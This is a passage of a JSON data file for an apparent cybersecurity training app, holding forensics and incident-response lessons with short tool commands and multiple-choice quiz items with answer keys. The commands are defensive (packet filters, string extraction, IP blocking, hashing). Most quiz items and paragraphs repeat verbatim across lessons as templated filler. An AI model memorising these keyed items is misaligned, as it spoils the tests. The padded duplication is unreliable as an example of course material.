Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"pcap-analysis","cat":"Forensics & IR","title":"PCAP Analysis","diff":1,"xp":100,"intro":"Network captures tell the full story.","sections":[{"type":"text","content":"Analyze PCAPs for C2, exfiltration, credentials, DNS tunneling."},{"type":"code","lang":"bash","content":"tshark -r capture.pcap -Y 'http.request.method == POST'\ntshark -r capture.pcap --export-objects http,/output/"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Filter for HTTP POST in Wireshark?","opts":["tcp.port == 80","http.request.method == POST","http.response","tcp.flags.syn"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"wireshark-filters","cat":"Forensics & IR","title":"Wireshark Display Filters","diff":1,"xp":75,"intro":"The right filter finds the packets that matter.","sections":[{"type":"text","content":"Master display filters to isolate malicious traffic."},{"type":"code","lang":"bash","content":"ip.addr == 10.10.10.5\ndns.qry.name contains \"evil\"\ntcp.flags.syn == 1 && tcp.flags.ack == 0  # port scan"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"SYN packet filter?","opts":["tcp.syn","tcp.flags.syn == 1 && tcp.flags.ack == 0","tcp.port == 0","tcp.stream"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"malware-static-analysis","cat":"Forensics & IR","title":"Malware Static Analysis","diff":2,"xp":150,"intro":"Analyze without running. Strings and imports tell a story.","sections":[{"type":"text","content":"Extract strings, analyze PE headers, check imports, compute hashes."},{"type":"code","lang":"bash","content":"strings malware.exe | grep -i 'http|cmd|password'\n# URLDownloadToFile = downloads payload"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"URLDownloadToFile in imports suggests?","opts":["Reads files","Downloads additional payloads","Encrypts files","Web browser"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"malware-dynamic-analysis","cat":"Forensics & IR","title":"Malware Dynamic Analysis","diff":2,"xp":200,"intro":"Run in sandbox, watch behavior.","sections":[{"type":"text","content":"Monitor API calls, file changes, registry modifications, network connections."},{"type":"code","lang":"bash","content":"# ProcMon + Wireshark + Regshot in a VM\ncuckoo submit malware.exe"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Dynamic over static advantage?","opts":["Faster","See what malware actually does","No sandbox needed","Works on encrypted"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"incident-response-process","cat":"Forensics & IR","title":"Incident Response Process","diff":1,"xp":75,"intro":"The six-phase NIST framework.","sections":[{"type":"text","content":"Preparation, Detection, Containment, Eradication, Recovery, Lessons Learned."},{"type":"code","lang":"bash","content":"# Triage: netstat -tlnp && ps auxf && last -a"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Correct IR phase order?","opts":["Detection, Preparation, Recovery","Preparation, Detection, Containment, Eradication, Recovery, Lessons Learned","Containment, Detection, Recovery","Eradication, Detection, Containment"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"containment-strategies","cat":"Forensics & IR","title":"Containment Strategies","diff":1,"xp":75,"intro":"Stop the bleeding before the surgery.","sections":[{"type":"text","content":"Isolate affected systems, disable accounts, block IPs. Preserve evidence."},{"type":"code","lang":"bash","content":"iptables -A INPUT -s 203.0.113.50 -j DROP\nnet user compromised /active:no"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Primary containment goal?","opts":["Delete malware","Prevent the incident from spreading","Restore backups","Notify press"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"chain-of-custody","cat":"Forensics & IR","title":"Chain of Custody","diff":1,"xp":50,"intro":"Unbroken evidence handling or it's inadmissible.","sections":[{"type":"text","content":"Document every person, time, and action. Hash at collection."},{"type":"code","lang":"bash","content":"sha256sum /dev/sda > evidence_hash.txt"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Broken chain of custody means?","opts":["Nothing","Evidence may be inadmissible","Investigation speeds up","Evidence is encrypted"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"steganography-detection","cat":"Forensics & IR","title":"Steganography Detection","diff":2,"xp":150,"intro":"Data hidden in images, audio, documents.","sections":[{"type":"text","content":"LSB in images, appended data, metadata fields. Tools detect statistical anomalies."},{"type":"code","lang":"bash","content":"binwalk image.png\nsteghide extract -sf image.jpg\nzsteg image.png"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"What is LSB steganography?","opts":["Hiding data in Least Significant Bits of pixels","Encrypting image","Compressing image","Changing extension"],"ans":0},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk 